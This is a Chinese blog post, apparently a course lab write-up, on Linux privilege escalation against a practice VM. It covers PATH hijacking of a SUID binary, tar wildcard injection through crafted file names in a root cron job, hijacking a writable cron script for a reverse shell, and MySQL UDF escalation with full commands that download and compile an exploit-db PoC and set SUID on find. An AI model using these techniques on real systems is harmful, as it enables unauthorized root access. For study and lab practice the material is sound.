第104天: 权限提升-Linux 系统&环境变量&定时任务&权限配置不当&MDUT 自动化

已于 2024-06-13 11:33:36 修改
阅读量854 收藏 29
点赞数 11
文章标签: 安全
于 2024-06-13 11:32:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/139574895
版权

目录

案例一:Linux-环境变量文件配合 SUID-本地

案例二:Linux-定时任务打包配合 SUID-本地

案例三:Linux-定时任务文件权限配置不当-WEB&本地

案例四:Linux-第三方软件 MYSQL 数据库提权-WEB&本地

隧道出网

手工提权

案例一:Linux-环境变量文件配合 SUID-本地

原理

 复现demo.c文件源代码

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

demo.c文件进行编译生成shell文件

加上suid权限

 这个时候执行shell,就是利用root权限去执行ps命令

切换普通用户权限

进行提权操作,把bash命令复制到/tmp下

这个时候需要进行环境覆盖,让/tmp下的ps在/bin下之前执行。

export PATH=/tmp:$PATH

这个时候再运行./shell

实战应用

1.普通用户权限下先获取suid所有程序
2.去除系统自带的一些命令(筛选第三方程序)
3.对该程序进行反编译或者找源码 明白该程序的作用
4.思考该程序有无执行一些环境变量命令(ps ping su sudo 等 比如该shell程序执行了ps命令

5.尝试通过复制suid提权命令 复制替换原来的执行命令 (先添加环境变量 优先执行复制后的命令)

案例二:Linux-定时任务打包配合 SUID-本地

项目背景:运维为了防止数据丢失,会定时运行计划任务,把项目打包

tar zxf 1.tar.gz /var/www/*

这里首先先创建一个计划任务

backup.sh,记得加执行命令(去/tmp路径下,把tmp下的所有文件打包成backup.tar.gz)

cd /tmp;tar czf /tmp/backup.tar.gz *

 去/etc/crontab下写上一条

* * * * * root /tmp/backup.sh

自动打包

这个时候切换普通用户,写入这几条命令

echo "" > "--checkpoint-action=exec=sh test.sh"        

#将空文件写入--checkpoint-action=exec=sh test.sh中
echo "" > --checkpoint=1
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > test.sh  

#写入命令  chmod +s对可执行文件升级权限 赋予suid权限
chmod +x test.sh

再打包时因为文件名的原因,会自动进行命令拼接,解释:

tar czf /tmp/backup.tar.gz --checkpoint-action=exec=sh test.sh  #自动执行test.sh
tar czf /tmp/backup.tar.gz --checkpoint=1   #每处理512个字节执行一次命令

1分钟后出现了具有suid权限的bash

 然后运行该程序,这里我上一篇文章文章介绍了debian系统需要上-p参数才能够提权

实战应用

查看定时任务· 定时任务有没有可利用 (tar打包压缩等) 

案例三:Linux-定时任务文件权限配置不当-WEB&本地

在计划任务里面的backup.sh里面一般是没有修改文件的权限的

当加上修改权限的时候。就可以把里面的内容改成反弹shell的命令

 切换普通用户,修改文件内容

开启监听

反弹

案例四:Linux-第三方软件 MYSQL 数据库提权-WEB&本地

靶机下载地址:

链接:https://pan.baidu.com/s/1_ghJGJ3-bJZj1L4d6nlnYw?pwd=8e03
提取码:8e03

项目复现:https://zhuanlan.zhihu.com/p/270343652

nmap扫描

直接只展示mysql提权过程,菜刀连接

翻阅数据库的账号密码

利用哥斯拉建立连接尝试连接数据库

 nc反弹shell

进入mysql开启外联

外联命令

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'R@v3nSecurity' WITH GRANT OPTION;
flush privileges;

但是还是连接不上,原因是由于该靶机设置了防火墙设定

解决方法

手工提权(在webshell上面的数据库管理进行提权) 自己连自己
隧道出网(用外部或本机的工具项目提权 建立隧道)

隧道出网

利用刚才反弹的shell,进行木马编写,建立冰蝎连接(中间走了很多弯路,ip变了)

 用冰蝎建立连接

然后建立内网穿透

现在进行连接

连接成功

这个时候利用工具进行自动化提权

工具下载地址:GitHub - SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools

进行连接配置

直接进行提权

手工提权

可能用到的命令

下载mysql udf kali poc进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so
上传或下载1518到目标服务器
wget https://xx.xx.xx.xx/1518.so
进入数据库进行UDF导出
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建do_system函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
#配合使用find调用执行
touch xiaodi
find xiaodi –exec "whoami" \;
find xiaodi –exec "/bin/sh" \;
id

下载源文件

编译并且重命名

python开启简易网站

下载

进行udf导出

创建do_system函数,并且给find命令加上suid权限

 退出进行提权

xiaojiesec
关注
  • 11
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队内网攻防渗透:内网渗透之windows内网权限提升技术:MSSQL&MYSQL&REDIS&Memcached&PostgreSQL&Teamviewer
HACKONE的博客
06-01 406
将这三个文件放在同一个目录下,并在当前目录执行python cve-2023-38831-exp-gen.py test.png script.bat poc.rar获得验证文件qq.rar。通过查询里面的配置信息来进行其他漏洞利用,这个本身是没有利用漏洞,比如获取里面其他数据库配置信息登录提权。3、计算机用户或WEB权限:Winrar(CVE-2023-38831)下载cve的poc,使用cs制作cs木马,并放进去一个pdf作为载体。Oracle:(站库分离,非JSP,直接数据库到系统等)
Linux提权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 718
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了提取。
权限提升Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
今天是几号的博客
03-03 812
Linux-环境变量文件配合SUID-本地 Linux-定时任务打包配合SUID-本地 Linux-定时任务文件权限配置不当-WEB&本地 Linux-第三方软件MYSQL数据库提权-WEB&本地 利用phpmailer漏洞进行修改并反弹 1、无法外联走隧道-MDUT自动化数据库提权 2、利用Mysql提权 searchsploit-手工提权
104权限提升-Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
qq_46081990的博客
06-22 458
知识点总结 #知识点: 1、Linux提权-定时任务 2、Linux提权-环境变量 3、Linux提权-权限配置不当 4、Linux提权-数据库自动化 #系列内容: 内核,数据库,第三方服务,SUID&GUID,定时任务环境变量,SUDO,权限不当等 脏牛漏洞(CVE-2016-5195) Dirty Pipe(CVE-2022-0847) SUDO(CVE-2021-3156) Polkit(CVE-2021-4034) #截至目前思路点总结如下: 1.提权方法有部分适用在不同环境,当然也有
Linux提权:定时任务 && 环境变量 && 配置不当 && 数据库
qq_61553520的博客
06-01 955
比如chmod +x xxx.sh chmod 555 xxx.sh 这些都是正常的,但是有些管理员可能会由于粗心直接设置chmod 777 xxx.sh 此时普通用户也具有w权限,即具有写入权限,拿到普通用户权限之后可以直接修改xxx.sh,比如在脚本中添加反弹shell命令,从而利用定时任务执行反弹shell(执行为root权限)。使用单端口映射可以使多个不同的协议流量通过同一个端口进行传输。结合HTTP隧道和单端口映射,可以实现将其他协议的数据通过HTTP隧道传输,并映射到单个端口上的目标服务器上。
Linux权限提升定时任务环境变量权限配置不当、数据库等提权
剁椒鱼头没剁椒的博客
04-05 2317
在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。Linux权限提升—内核、SUID、脏牛等提权这里将一下在这个提权中需要注意的事项,总体来说有种莫名的鸡肋感觉。如果备份的文件夹你没有写入权限就GG。如果备份的命令是绝对路径也GG。如果管理员设置了其它权限也GG。如果是WEB权限也GG。可能有些文章中是在定时任务中直接写入压缩命令,来完成压缩的,下面我们就来具体分析一下这两条命令。
权限提升-Windows权限提升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目
siu~
03-24 668
1、Web到Win-数据库提权-MSSQL 2、Web到Win-数据库提权-MYSQL 3、Web到Win-数据库提权-Oracle 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Linux权限提升总结
m0_66458291的博客
04-01 1151
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。
MDUT v2.1.1 图形的数据库利用工具,数据库渗透测试工具
11-23
MDUT 全称 Multiple Database Utilization Tools,是一款中文的数据库跨平台利用工具,集合了多种主流的数据库类型。基于前人 SQLTOOLS 的基础开发了这套程序(向 SQLTOOLS 致敬),旨在将常见的数据库利用手段集合在...
MDUT,多种数据库综合利用工具。后渗透或者数据库方向的工具
08-04
MDUT,多种数据库综合利用工具。后渗透或者数据库方向的工具
数据库连接jar包大集合
11-13
内含sqljdbc42,commons-collections4-4.0.jar,commons-dbcp-1.4.jar,commons-pool-1.6.jar,jmf.jar,mysql-connector-java-3.1.8-bin.jar,Oracle 11g 11.2.0.1.0 JDBC_ojdbc6.jar包
面试经验分享 | 24年6月某安全厂商HW面试经验
zkaqlaoniao的博客
06-17 612
也希望大家有什么护网相关的需求和建议都可以留在评论区,大家讨论下,嘿嘿嘿,希望大家伙都可以通过今年的护网面试。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。反射型XSS:反射型XSS攻击是一次性的攻击,当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 418
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
MVC 框架安全
A526847的博客
06-17 623
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
【启明智显产品分享】Model3工业级HMI芯片详解系列专题(三):安全、稳定、高防护
ami82的博客
06-20 580
Model3芯片具备高达8KV的ESD HBM防护,在恶劣的工业环境中能够抵抗各种电磁干扰,提升系统可靠性;Model3芯片支持高精度电子脉宽调制(EPWM)控制,能够满足复杂电机控制和精细过程控制的需要,在控制应用中更加精准;Model3芯片内置4线电阻触摸屏驱动,为用户提供便捷的交互途径,降低了外围BOM成本。
安全Linux Fanotify使用入门
追寻梦想的青春
06-19 734
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变,而global模式可以监控整个文件系统
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 283
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
揭秘网络安全攻防战
waitaikong_的博客
06-17 665
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样和复杂,防御策略也需要不断地更新和升级以应对新的挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值